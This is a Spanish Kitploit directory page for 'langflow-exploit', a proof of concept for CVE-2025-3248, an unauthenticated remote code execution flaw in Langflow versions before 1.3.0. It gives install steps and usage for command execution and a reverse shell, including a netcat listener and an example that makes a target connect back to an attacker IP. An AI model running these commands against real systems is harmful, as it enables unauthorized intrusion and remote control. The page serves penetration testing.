Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
langflow-exploit — PoC para CVE-2025-3248: RCE no autenticado en Langflow < 1.3.0 a través de /api/v1/validate/code. | Kitploit
Herramientas/GitHubGitHub/preemware/langflow-exploit
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubpreemware/langflow-exploit

langflow-exploit

PoC para CVE-2025-3248: RCE no autenticado en Langflow < 1.3.0 a través de /api/v1/validate/code.

Ver Repositorio
150hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3248 - RCE en el endpoint de validación de código de Langflow

Un exploit de prueba de concepto que demuestra una vulnerabilidad de ejecución remota de código en el endpoint de validación de código de Langflow. Esta vulnerabilidad afecta a las versiones de Langflow anteriores a la 1.3.0, permitiendo a atacantes no autenticados ejecutar código arbitrario mediante solicitudes HTTP manipuladas.

Detalles de la vulnerabilidad

  • CVE ID: CVE-2025-3248
  • Versiones afectadas: < 1.3.0
  • Vector de ataque: Remoto
  • Autenticación requerida: No
  • Impacto: Ejecución remota de código (RCE)
  • Endpoint: /api/v1/validate/code

Requisitos previos

  • Python 3.x
  • Paquetes de Python requeridos:
    • requests
    • colorama

Instalación

  1. Clona el repositorio:
root@kitploit:~
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
  1. Instala las dependencias:
root@kitploit:~
pip install requests colorama

Uso

El exploit admite dos modos de funcionamiento:

1. Modo de ejecución de comandos

Ejecuta un único comando en el sistema objetivo:

root@kitploit:~
python3 cve-2025-3248.py cmd <target_url> "<command>"

Ejemplo:

root@kitploit:~
python3 cve-2025-3248.py cmd http://target:7860 "id"

2. Modo de shell inversa

Genera una shell inversa interactiva:

  1. Primero, inicia un listener en tu máquina:
root@kitploit:~
nc -lvnp 4444
  1. Después, ejecuta el exploit:
root@kitploit:~
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>

Ejemplo:

root@kitploit:~
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
Descargar herramienta